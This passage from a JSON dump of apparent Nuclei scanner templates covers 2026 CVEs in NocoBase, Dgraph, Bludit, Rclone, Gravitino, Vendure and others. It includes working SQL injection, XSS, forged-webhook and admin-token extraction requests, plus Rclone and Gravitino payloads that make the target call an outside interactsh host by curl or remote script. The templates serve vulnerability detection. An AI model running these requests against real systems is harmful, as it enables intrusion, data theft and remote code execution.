490a00463044022020ce6c47e533c6b70eaddf2608f28df5c3d228e9b4dd5df9c2915b14ad122560022006e782386eff1af179cf6abb049e6d7a34bb6d9286691dd62759297c1b0c1318:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41679.yaml","vuln_id":"cve-2026-41679"},{"raw":"id: CVE-2026-41641\n\ninfo:\n  name: NocoBase - SQL Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    NocoBase @nocobase/plugin-collection-sql versions prior to 2.0.39 are vulnerable to SQL injection via the sqlCollection:update endpoint. The checkSQL() function, which blocks dangerous SQL keywords and ensures only SELECT statements are allowed, is not called during collection updates.\n  remediation:\n    Upgrade NocoBase to version 2.0.39 or later\n  reference:\n    - https://github.com/advisories/GHSA-wrwh-c28m-9jjh\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41641\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.2\n    cve-id: CVE-2026-41641\n    epss-score: 0.01833\n    epss-percentile: 0.77959\n    cwe-id: CWE-89\n  metadata:\n    max-request: 5\n    verified: true\n    vendor: nocobase\n    product: nocobase\n  tags: cve,cve2026,sqli,nocobase,sqli,authenticated\n\nflow: http(1) && http(2) && http(3) || http(4)\n\nvariables:\n  name: \"{{randstr}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/auth:signIn HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"account\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        internal: true\n        regex:\n          - '\"token\":\"([^\"]+)\"'\n        group: 1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/collections:create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"name\":\"{{name}}\",\"sql\":\"SELECT 1 as id\",\"fields\":[{\"name\":\"id\",\"type\":\"integer\"}],\"template\":\"sql\"}\n\n      - |\n        POST /api/sqlCollection:update?filterByTk={{name}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"sql\":\"SELECT * FROM users\",\"fields\": [ {\"name\": \"id\", \"type\": \"integer\"}, {\"name\": \"email\", \"type\": \"string\"}, {\"name\": \"password\", \"type\": \"string\"}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/{{name}}:list HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"email\", \"password\")'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/app:getInfo\"\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        regex:\n          - '\"version\":\"(.*?)\"'\n        group: 1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"dialect\\\"\", \"\\\"version\\\"\")'\n          - 'compare_versions(version, \"<2.0.39\")'\n        condition: and\n# digest: 4b0a00483046022100e7f045f07bbe359a5c0160bccb0e2378f818209d184b605da0e07b54893f8300022100e903b447fbf381b4af3c21788d547a52af698345dea78ab4100a1bde558f3862:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-41641.yaml","vuln_id":"cve-2026-41641"},{"raw":"id: CVE-2026-41640\n\ninfo:\n  name: NocoBase - SQL Injection\n  author: theamanrawat\n  severity: high\n  description: |\n    NocoBase versions prior to 2.0.39 contain a SQL injection vulnerability in the @nocobase/database package. The queryParentSQL function in eager-loading-tree.ts constructs a recursive CTE query by directly concatenating user-controlled primary key values into the SQL WHERE IN clause without parameterization. An authenticated attacker with record creation permissions on a tree collection with string-type primary keys can inject arbitrary SQL via crafted record identifiers, enabling full database compromise including data exfiltration and modification.\n  remediation:\n    Upgrade NocoBase to version 2.0.39 or later which uses parameterized bind variables instead of string concatenation in recursive eager loading queries.\n  reference:\n    - https://github.com/advisories/GHSA-4948-f92q-f432\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41640\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.5\n    cve-id: CVE-2026-41640\n    epss-score: 0.01875\n    epss-percentile: 0.78475\n    cwe-id: CWE-89\n  metadata:\n    max-request: 7\n    verified: true\n    vendor: nocobase\n    product: nocobase\n  tags: cve,cve2026,sqli,nocobase,sqli,authenticated\n\nflow: http(1) && http(2) && http(3) || http(4)\n\nvariables:\n  cname: \"{{to_lower(rand_base(8))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/auth:signIn HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"account\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    extractors:\n      - type: regex\n        name: token\n        part: body\n        internal: true\n        regex:\n          - '\"token\":\"([^\"]+)\"'\n        group: 1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/collections:create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"name\":\"{{cname}}\",\"tree\":\"adjacencyList\",\"fields\":[{\"name\":\"id\",\"type\":\"string\",\"primaryKey\":true,\"interface\":\"input\"},{\"name\":\"title\",\"type\":\"string\",\"interface\":\"input\"},{\"name\":\"parent\",\"type\":\"belongsTo\",\"target\":\"{{cname}}\",\"foreignKey\":\"parentId\",\"targetKey\":\"id\",\"treeParent\":true},{\"name\":\"children\",\"type\":\"hasMany\",\"target\":\"{{cname}}\",\"foreignKey\":\"parentId\",\"sourceKey\":\"id\",\"treeChildren\":true}]}\n\n      - |\n        POST /api/{{cname}}:create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"id\":\"safe_root\",\"title\":\"Root Node\"}\n\n      - |\n        POST /api/{{cname}}:create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"id\":\"safe_root') UNION ALL SELECT CAST(version() AS integer)::text, NULL::text WHERE ('1'='1\",\"title\":\"injection\",\"parentId\":\"safe_root\"}\n\n      - |\n        POST /api/{{cname}}:create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"id\":\"leaf_node\",\"title\":\"leaf\",\"parentId\":\"safe_root') UNION ALL SELECT CAST(version() AS integer)::text, NULL::text WHERE ('1'='1\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/{{cname}}:list?appends[]=parent(recursively%3Dtrue)&pageSize=100 HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains(body, \"invalid input syntax for type integer\")'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/app:getInfo\"\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        regex:\n          - '\"version\":\"(.*?)\"'\n        group: 1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"dialect\\\"\", \"\\\"version\\\"\")'\n          - 'compare_versions(version, \"<=2.0.32\")'\n        condition: and\n# digest: 4b0a00483046022100e39c23afba4ef34993142f143143a0a918e526e0b8a9e6d259abec0b8ed8c46c022100e3a8988381d116f64e197ab1194f6d1db832ed827de29e3482c3d58e5917c2fe:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-41640.yaml","vuln_id":"cve-2026-41640"},{"raw":"id: CVE-2026-41492\n\ninfo:\n  name: Dgraph <= 25.3.2 - Admin Token Disclosure\n  author: Divine Balija\n  severity: critical\n  description: |\n    Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes  the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.\n  remediation: |\n    Update to Dgraph version 25.3.3 or later.\n  reference:\n    - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41492\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-41492\n    epss-score: 0.03082\n    epss-percentile: 0.87111\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dgraph\n    product: dgraph\n    shodan-query: \"Dgraph\"\n  tags: cve,cve2026,dgraph,exposure,token\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/debug/vars\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"cmdline\"\n          - \"token=\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - 'token=([^\"\\\\]+)'\n# digest: 490a004630440220126dcf90f2237ed9fd77ef54f54a4dbbb7cf697c3315413d114e09a77f1fc1ee0220307db5a7d97e5cd7fda870fbf3b162b7fbbd53cb887c0bc0390df143d1ac230f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41492.yaml","vuln_id":"cve-2026-41492"},{"raw":"id: CVE-2026-41456\n\ninfo:\n  name: Bludit CMS <= 3.20.0 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    Bludit CMS contains a reflected XSS caused by improper sanitization in the search plugin, letting unauthenticated attackers inject arbitrary JavaScript, exploit requires crafted malicious search query.\n  impact: |\n    Attackers can execute malicious scripts in users' browsers, potentially stealing session cookies or performing actions on their behalf.\n  remediation: |\n    Update to the version including commit 6732dde or later.\n  reference:\n    - https://github.com/bludit/bludit/commit/6732ddedda8b73ce0a017a1b6adf685100244e01\n    - https://gist.github.com/thepiyushkumarshukla/36b213cdb3c7d603e23fd23605cd681e\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41456\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-41456\n    epss-score: 0.01902\n    epss-percentile: 0.78796\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: bludit\n    product: bludit\n    shodan-query: http.html:\"Bludit\"\n    fofa-query: body=\"Powered by Bludit\" || body=\"bludit.com\"\n  tags: cve,cve2026,bludit,xss,cms\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"powered by bludit\", \"content=\\\"bludit\\\"\", \"bl-kernel\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /search/%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E.gif HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains_any(tolower(body), \"bludit\")'\n          - 'contains(body, \"onerror=alert(document.domain)>\")'\n        condition: and\n# digest: 4b0a00483046022100be21c79ac0b313a52defc3b3f11b090855c18fff0b2059deb07fe25365f9ef89022100baf2e9f27cd3ec0133f95c8938ae0d441db3d791b4be96916bd71b1e6731c22f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-41456.yaml","vuln_id":"cve-2026-41456"},{"raw":"id: CVE-2026-41452\n\ninfo:\n  name: Krayin CRM < 2.2.1 - Installer Authentication Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    Krayin CRM 2.2.4 contains a missing authentication vulnerability in the installer middleware caused by bypassing the CanInstall middleware redirect check via crafted HTTP POST requests, letting unauthenticated remote attackers overwrite the primary administrator account and gain full administrative access, exploit requires crafted HTTP POST with specific header.\n  impact: |\n    Unauthenticated attackers can gain full administrative access, compromising all CRM data and control.\n  remediation: |\n    Update to the latest version that patches this vulnerability.\n  reference:\n    - https://github.com/krayin/laravel-crm/releases\n    - https://github.com/krayin/laravel-crm/compare/v2.2.0...v2.2.1\n  classification:\n    cve-id: CVE-2026-41452\n    epss-score: 0.02454\n    epss-percentile: 0.83695\n    cwe-id: CWE-287\n    cvss-score: 9.8\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: webkul\n    product: krayin-laravel-crm\n    fofa-query: title=\"Krayin\" || header=\"krayin_crm_session\"\n  tags: cve,cve2026,krayin,laravel,php,installer,auth-bypass\n\nhttp:\n  - raw:\n      - |\n        GET /install HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(tolower(body), \"krayin\", \"installation\", \"installer\")'\n        condition: and\n# digest: 4b0a00483046022100c3224ccc529b1921185f1314c76c7b196a9691a74434a93f633d2bb440c72934022100ca76514d2d9d16351ff7d9b604da1c6e1f6b59a1a0c6e6a0a3224d4c44292add:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41452.yaml","vuln_id":"cve-2026-41452"},{"raw":"id: CVE-2026-41432\n\ninfo:\n  name: New API < v0.12.10 - Stripe Webhook Bypass\n  author: str4k3r\n  severity: high\n  description: |\n    New API < v0.12.10 contains a broken authentication caused by unauthenticated attacker forging Stripe webhook events, letting attackers credit arbitrary quota without payment, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can credit arbitrary quota to their account without payment, causing financial and resource abuse.\n  remediation: |\n    Update to version 0.12.10 or later.\n  reference:\n    - https://github.com/advisories/GHSA-xff3-5c9p-2mr4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41432\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L\n    cvss-score: 7.1\n    cve-id: CVE-2026-41432\n    epss-score: 0.0085\n    epss-percentile: 0.56631\n    cwe-id: CWE-345\n  metadata:\n    max-request: 1\n    verified: true\n    fofa-query: 'icon_hash==\"-1398762159\"'\n  tags: cve,cve2026,new-api,stripe,webhook,auth-bypass\n\nvariables:\n  timestamp: \"{{unix_time()}}\"\n  event_body: '{\"type\":\"checkout.session.completed\",\"data\":{\"object\":{\"client_reference_id\":\"nuclei-probe\",\"status\":\"complete\",\"payment_status\":\"paid\",\"customer\":\"cus_probe\",\"amount_total\":0,\"currency\":\"usd\"}}}'\n  signature: '{{hmac(\"sha256\", concat(timestamp, \".\", event_body), \"\")}}'\n\nhttp:\n  - raw:\n      - |-\n        POST /api/stripe/webhook HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Stripe-Signature: t={{timestamp}},v1={{signature}}\n\n        {{event_body}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"webhook handled\", \"\\\"success\\\"\", \"\\\"status\\\":\\\"success\\\"\")'\n          - '!contains_any(tolower(body), \"<html\", \"not found\", \"error\", \"forbidden\", \"unauthorized\", \"invalid signature\")'\n        condition: and\n# digest: 490a004630440220313eb5bf703ce38cc23c3b54476f919a1a6e953161c5029b6767c63efa33130602202c7256b033ba6df3ab5b7afa0b4a8d1d223e018fa2fc56c73a7c74ec4119e2c6:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-41432.yaml","vuln_id":"cve-2026-41432"},{"raw":"id: CVE-2026-41179\n\ninfo:\n  name: RClone RC - Command Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.\n  impact: |\n    Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to version 1.73.5 or later.\n  reference:\n    - https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41179\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 9.2\n    cve-id: CVE-2026-41179\n    epss-score: 0.08585\n    epss-percentile: 0.94832\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: rclone\n    product: rclone\n  tags: cve,cve2026,rce,rclone,webdav,oast,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /rc/noop HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"{}\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /operations/fsinfo HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"fs\":\":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"Features\")'\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402203443bea8c2973f1c7fd2dd976391655bb4e7aed314cbb6ca011c99abf6bac8b9022070dfedb6a7bc6b04091ff6b0935c94047a6eb9df09acb4bc1b81ae02f87d789a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41179.yaml","vuln_id":"cve-2026-41179"},{"raw":"id: CVE-2026-41176\n\ninfo:\n  name: Rclone RC - Broken Access Control\n  author: theamanrawat\n  severity: critical\n  description: |\n    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.\n  impact: |\n    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.\n  remediation: |\n    Upgrade to version 1.73.5 or later.\n  reference:\n    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176\n  classification:\n    cvss-score: 9.2\n    cve-id: CVE-2026-41176\n    epss-score: 0.32715\n    epss-percentile: 0.98269\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: rclone\n    product: rclone\n  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /config/listremotes HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 403'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /options/set HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"rc\":{\"NoAuth\":true}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"{}\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /config/listremotes HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n      - |\n        POST /options/set HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"rc\":{\"NoAuth\":false}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"remotes\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n# digest: 4b0a00483046022100a23d1d64fb819044a8675516879defc487c5719bedb2ae07ecc5cb5a1486289b022100af1039ff43b65a3caa771b5b7331d4b4a47237e1d14e08fba29b0896b2a315ad:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41176.yaml","vuln_id":"cve-2026-41176"},{"raw":"id: CVE-2026-4106\n\ninfo:\n  name: HT Mega < 3.0.7 - Sensitive Information Disclosure\n  author: EFETR\n  severity: high\n  description: |\n    The HT Mega plugin for WordPress is vulnerable to Sensitive Information Exposure via AJAX actions. This template dynamically extracts the security nonce before exploitation.\n  reference:\n    - https://wpscan.com/vulnerability/9477ead2-3990-4aae-8e66-09ee2f4daa3e/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-4106\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-4106\n    epss-score: 0.00742\n    epss-percentile: 0.53215\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: hastech\n    product: ht-mega-for-elementor\n    framework: wordpress\n    publicwww-query: \"/plugins/ht-mega-for-elementor/\"\n  tags: cve,cve2026,wordpress,wp-plugin,ht-mega-for-elementor,exposure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: extracted_nonce\n        part: body\n        group: 1\n        regex:\n          - 'security[\"'':\\s]+([a-f0-9]{10})'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wcsales_purchased_products&security={{extracted_nonce}}&limit=10\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"buyer\":'\n          - '\"fname\":'\n          - '\"city\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502205c545bc94ba2d70f0869140cb4f246a30dd73d6b2d0032192b10226179d775fc022100f102e7401aa456725b4c49a049f90b6e2c4bdc36139af8c4b8c4346f366d887f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-4106.yaml","vuln_id":"cve-2026-4106"},{"raw":"id: CVE-2026-41042\n\ninfo:\n  name: Apache Gravitino < 1.2.1 - Unauthenticated Remote Code Execution\n  author: buzhimingdeaikun\n  severity: critical\n  description: |\n    Apache Gravitino < 1.2.1 contains a remote code execution caused by unsanitized H2 JDBC URL via testConnection API using H2's INIT parameter, letting unauthenticated attackers execute arbitrary Java code remotely, exploit requires H2 usage.\n  impact: |\n    Unauthenticated attackers can execute arbitrary Java code on the server, potentially leading to full system compromise.\n  remediation: |\n    Upgrade to version 1.2.1 or later.\n  reference:\n    - https://github.com/advisories/GHSA-59xm-4m8c-g3xj\n    - https://lists.apache.org/thread/vdh88wc6j5b38v65ncb111wbbnkf6bvm\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-41042\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-41042\n    epss-score: 0.01512\n    epss-percentile: 0.73348\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: apache\n    product: gravitino\n    shodan-query: title:\"Gravitino\"\n    fofa-query: title=\"Gravitino\"\n  tags: cve,cve2026,apache,gravitino,rce,unauth,oast,h2,jdbc\n\nvariables:\n  ml_name: \"{{rand_base(6)}}\"\n  db_name: \"{{rand_base(8)}}\"\n  filename: \"{{to_lower(rand_text_alpha(5))}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/metalakes HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"{{ml_name}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/json\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/metalakes/{{ml_name}}/catalogs/testConnection HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/vnd.gravitino.v1+json\n\n        {\"name\":\"h2rce\",\"type\":\"RELATIONAL\",\"provider\":\"jdbc-mysql\",\"properties\":{\"jdbc-url\":\"jdbc:h2:mem:{{db_name}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/{{filename}}.sql'\",\"jdbc-user\":\"sa\",\"jdbc-password\":\"\",\"jdbc-driver\":\"org.h2.Driver\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, \"http\")\n          - contains(interactsh_request, \"/{{filename}}.sql\")\n          - status_code == 500\n        condition: and\n# digest: 4b0a00483046022100e3365b1b1b20988b2b8046953f6b238263cad56c95756c06ea98761c0777def7022100c3c03f17a909c34416e3c2d62949131a8b5c87024175292ded483628adfc386b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-41042.yaml","vuln_id":"cve-2026-41042"},{"raw":"id: CVE-2026-40887\n\ninfo:\n  name: Vendure Core - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    Vendure, an open-source headless commerce platform built on Node.js/TypeScript, contains a critical SQL injection vulnerability in its Shop API. The languageCode query parameter is interpolated directly into a raw SQL CASE expression in ProductService.findOneBySlug without parameterization or input validation, allowing unauthenticated attackers to execute arbitrary SQL commands. This can lead to full database disclosure and denial of service.\n  remediation: Upgrade @vendure/core to version 3.6.2, 3.5.7, or 2.3.4 or later, which add input validation and parameterized queries for the languageCode parameter.\n  reference:\n    - https://github.com/advisories/GHSA-9pp3-53p2-ww9v\n    - https://github.com/vendurehq/vendure/security/advisories/GHSA-9pp3-53p2-ww9v\n    - https://github.com/vendurehq/vendure/commit/3ff0bc1\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40887\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n    cvss-score: 9.1\n    cve-id: CVE-2026-40887\n    epss-score: 0.01762\n    epss-percentile: 0.77038\n    cwe-id: CWE-89\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: http.header:\"vendure-auth-token\"\n    fofa-query: header=\"vendure-auth-token\"\n  tags: cve,cve2026,vendure,sqli,unauthenticated\n\nvariables:\n  num: 999999999\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /shop-api HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\":\"{ __typename }\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(header, \"vendure-auth-token\")'\n          - 'contains(body, \"\\\"data\\\"\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /shop-api?languageCode=en'+AND+EXTRACTVALUE(5202,CONCAT(0x5c,(SELECT+MD5('{{num}}'))))+AND+'ptic'%3d'ptic HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\":\"{ product(slug: \\\"a\\\") { id name } }\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'c8c605999f3d8352d7bb792cf3fd'\n          - '\"product\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022011643fa980a4cd560a61d1f7b6b2e97506241070ee34a3f9995f353947ec9007022013fee03c34538f05e1840f9187d55592948b8173f613a78d61da9d22d49dc9de:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-40887.yaml","vuln_id":"cve-2026-40887"},{"raw":"id: CVE-2026-40878\n\ninfo:\n  name: Mailcow < 2026-03b - Href Link Injection\n  author: ritikchaddha\n  severity: low\n  description: |\n    mailcow < 2026-03b reflects raw REQUEST_URI into JavaScript and href links on the login page, allowing attackers to inject parameters that break JS logic and enable phishing.\n  impact: |\n    Unauthenticated parameter injection into JavaScript and href attributes on the login page. Enables phishing, open-redirect chaining, and JS logic corruption (DoS of FIDO2/WebAuthn and CSRF handlers) via backslash injection.\n  remediation: |\n    Upgrade to mailcow 2026-03b or later.\n  reference:\n    - https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-xv9r-j862-5hqf\n    - https://github.com/mailcow/mailcow-dockerized\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40878\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L\n    cvss-score: 3.1\n    cve-id: CVE-2026-40878\n    epss-score: 0.00805\n    epss-percentile: 0.55254\n  metadata:\n    verified: 